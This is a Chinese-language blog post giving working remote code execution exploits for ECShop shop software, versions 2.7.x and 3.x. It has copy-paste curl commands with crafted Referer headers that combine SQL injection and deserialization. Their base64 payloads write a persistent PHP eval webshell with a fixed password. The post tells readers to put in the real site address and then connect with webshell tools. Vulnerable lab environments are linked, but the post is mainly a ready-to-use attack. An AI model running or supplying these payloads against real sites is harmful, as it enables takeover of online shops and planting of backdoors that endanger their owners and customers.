ECShop <= 2.x/3.6.x/3.0.x 版本远程代码执行高危漏洞利用

一、简介

这一篇文章接下来我会分为两个部分来写,因为 ECShop 其实两个比较大的远程代码执行是有两个不同版本先后爆出来的,首先被爆出来的是:ECShop <= 2.7.x 全系列版本远程代码执行高危漏洞,然后紧接着 ECShop 官方发布了 3.0.x 系列版本,以来应对 2.7.x 系列版本漏洞,但是后来又被发现爆出来 2.x 以及 3.x版本通用远程代码执行漏洞,绕过了修复的 2.x 版本的防护,所以接下来就分别开始演示。
因为网上有一些文章并没有详细讲解漏洞 payload 并且有些部分存在版本差异问题,导致部分 payload 并不通用,所以才有了本文的诞生。

二、ECShop <= 2.7.x 版本

我这里采用的是 vulnspy 的在线环境,链接:https://www.vsplate.com/?github=vulnspy/ECShop_2.7.3_UTF8_installed&autogo=1 点击即可生成。这个漏洞产生的根本原因在 user.php 文件中,具体原理见这里我们主要讲一下 payload 的使用方法。
在 Linux 操作系统环境下,2.7.x 版本应该使用如下 payload 进行攻击,复制下面的命令到命令窗口执行即可

curl http://www.writeup.top/user.php \
-d 'action=login&vulnspy=eval(base64_decode($_POST[d]));exit;&d=ZmlsZV9wdXRfY29udGVudHMoJ3dyaXRldXAucGhwJywnPD9waHAgQGV2YWwoJF9QT1NUW3dyaXRldXBdKTs/PicpOw' \
-H 'Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:"id";s:3:"'"'"'/*";s:3:"num";s:201:"*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:4:"name";s:3:"ads";}554fcae493e564ee0dc75bdf2ebf94ca'

其中 http://www.writeup.top/ 应换为你真实的网站地址,第二行中 ZmlsZV9wdXRfY29udGVudHMoJ3dyaXRldXAucGhwJywnPD9waHAgQGV2YWwoJF9QT1NUW3dyaXRldXBdKTs/PicpOw 是经过 base64 编码的写入一句话木马的代码,解码出来如下:

file_put_contents('writeup.php','');

意思就是写入一个 writeup.php 文件,文件内写入一个一句话木马 <?php @eval($_POST[writeup]);?> 然后写入成功之后我们即可使用菜刀等工具连接这个一句话了,密码是 writeup 如果想要修改为别的,当然也是可以的,只需要按照格式写好,然后再经过 base64 编码一下即可。

三、ECShop 3.x 版本

漏洞在线环境:https://www.vsplate.com/?github=vulnspy/ECShop_3.6.0_UTF8_vuln_installed&autogo=1
原理同上,但是 payload 有所变化

curl http://www.writeup.top/user.php \
-d "action=login&vulnspy=eval/**/(base64_decode(ZmlsZV9wdXRfY29udGVudHMoJ3dyaXRldXAucGhwJywnPD9waHAgQGV2YWwoJF9QT1NUW3dyaXRldXBdKTs/PicpOw));exit;" \
-H 'Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:3:{s:3:"num";s:207:"*/ select 1,0x2720756e696f6e2f2a,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:2:"id";s:9:"'"'"' union/*";s:4:"name";s:3:"ads";}45ea207d7a2b68c49582d2d22adf953a'

写入的地址依旧是 http://网址/writeup.php 一句话密码是 writeup 接下来就随便搞吧。

四、参考链接
ECShop <= 2.7.x 全系列版本远程代码执行高危漏洞利用
ECShop <= 2.x/3.6.x/3.0.x 版本远程代码执行高危漏洞利用
预警| ECShop全系列版本远程代码执行高危漏洞 阿里云WAF已可防御

发表评论

电子邮件地址不会被公开。必填项已用 * 标注